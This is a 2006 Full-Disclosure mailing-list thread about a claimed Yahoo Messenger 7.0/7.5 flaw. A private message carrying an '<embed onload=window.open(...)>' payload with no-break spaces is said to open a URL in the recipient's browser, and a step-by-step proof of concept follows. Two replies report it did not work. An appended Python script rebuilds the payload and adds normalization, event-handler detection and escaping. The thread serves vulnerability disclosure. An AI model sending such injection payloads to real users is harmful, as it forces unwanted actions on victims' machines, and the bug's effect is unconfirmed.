[Full-disclosure] Yahoo messenger serious bug

evilrabbi evilrabbi at gmail.com
Fri Jul 28 17:22:06 BST 2006


didn't work for me either.

On 7/28/06, John Dietz <www.whitewolf at gmail.com> wrote:
>
> I just tried this in Messenger 7.0 and it never opened a browser window.  I
> copied the text exactly from here and made sure the space after helomsg was
> [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the
> string.  Other side sees:
>
> s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg<?#@@*-%29?@+%23@;?%28msg>:
> ---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>:
> ---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
> Yahoo! Search: No results were found for helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>:
> ---------------------------------------------<embed
>
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>:
> ---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(.
>
> There must be some other settings on either Messenger or the computer
> itself for this to work as you say.  Possibly a setting for Messenger to use
> your default browser for searches instead of the PM window?
>
> Cheers
>
>
> On 7/28/06, Ivan Ivan <ivancool2003 at yahoo.com.ar> wrote:
> >
> > Hi,
> > I found another vulnerability in Yahoo Messenger: if
> > you receive a private message with this string
> >
> > "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> > onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> >
> > onload=window.open
> > ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
> > (without quotes), Yahoo Messenger opens google.com
> > in the Internet Explorer of the remote
> > victim.
> >
> > Yahoo messenger bug proof of concept:
> >
> > 1. Open Messenger and log in.
> >
> > 2. Open a third-party Yahoo chat client like yahelite
> > over the Ymsgr protocol and log in with another account.
> >
> > 3. Send a PM to the Messenger account with this
> > string: s: helomsg
> >
> > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> > onload=window.open('http:\\\\google.com/')>helomsg
> > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> >
> > onload=window.open('http:\\\\google.com/')>helomsg
> > :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
> >
> > 4. The remote user will open www.google.com (you can
> > change it)
> >
> > Note: the space in "helomsg :" must be typed with
> > alt+0160, and the space in "s: " is a normal space
> >
> >
> > s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> > onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> >
> > onload=window.open
> > ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
> >
> > Tested on Yahoo Messenger 7.0/7.5
> >
> >
> > Regards.
> >
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> There is intelligence is in having all the answers, but wisdom lies in
> knowing which of the questions to answer.
>
>
>


-- 
-- h0 h0 h0 --
www.nopsled.net
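The payload the thread describes, rebuilt as a string with the U+00A0 (alt+0160) the author insists on, alongside the check a chat client should apply before rendering a private message: fold Unicode whitespace to ASCII, look for any tag carrying an on* event-handler attribute, and escape the text rather than parse it as HTML. This is an added example, not code from the thread or from Yahoo; the helper names, the 45-dash count, and the idea that a filter keyed on an ordinary space can be slipped past with a no-break space are assumptions made here, not facts established by the posts.

```python
import html
import re
import unicodedata

# Constructed from the thread: the junk run that follows each "helomsg", and
# the U+00A0 (alt+0160) the author says must replace the ordinary space.
GARBAGE = ":+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
NBSP = "\u00a0"
DASHES = "-" * 45  # assumed count; the post's run of dashes is not exactly measurable

# Any tag carrying an on* event-handler attribute (onload=, onerror=, onclick=, ...).
EVENT_HANDLER_RE = re.compile(r"<\s*[a-z][a-z0-9]*\b[^>]*\bon[a-z]+\s*=", re.IGNORECASE)


def build_payload(url: str = r"http:\\\\google.com/") -> str:
    """Rebuild the PM body from the post (hypothetical helper, layout read off the thread):

    s: helomsg<NBSP><junk>msg:<dashes><embed ...>  twice, then a final helomsg<NBSP><junk>.
    The default URL keeps the four literal backslashes exactly as the post shows them.
    """
    embed = f"<embed onload=window.open('{url}')>"
    chunk = "helomsg" + NBSP + GARBAGE
    return "s: " + (chunk + "msg:" + DASHES + embed) * 2 + chunk


def normalize(text: str) -> str:
    """Fold Unicode whitespace, including U+00A0, to a single ASCII space.

    NFKC maps U+00A0 to U+0020 and the regex collapses whitespace runs, so a check
    that keys on a literal ' ' cannot be slipped past with a no-break space. That a
    space-keyed check is what alt+0160 defeats is an assumption, not a fact from the thread.
    """
    text = unicodedata.normalize("NFKC", text)
    return re.sub(r"\s+", " ", text)


def has_event_handler(text: str) -> bool:
    """True if the message, after normalization, contains a tag with an on* handler."""
    return EVENT_HANDLER_RE.search(normalize(text)) is not None


def render_safe(text: str) -> str:
    """What a chat client should do with a PM: display it as text, never parse it as HTML."""
    return html.escape(normalize(text), quote=True)


if __name__ == "__main__":
    pm = build_payload()
    print("raw body contains 'helomsg :' with an ASCII space:", "helomsg :" in pm)
    print("normalized body contains it:", "helomsg :" in normalize(pm))
    print("event handler present:", has_event_handler(pm))
    print("escaped for display:", render_safe(pm)[:80], "...")
```

Running the module shows the two faces of the same string: the raw body does not contain `helomsg :` with an ordinary space, the normalized body does, and the handler check fires either way because it runs on the normalized text. The escape step is the actual fix a client needs; the detection regex is only useful as a log or alert signal.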
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060728/745a8796/attachment.html 


Full-Disclosure is hosted and sponsored by Secunia.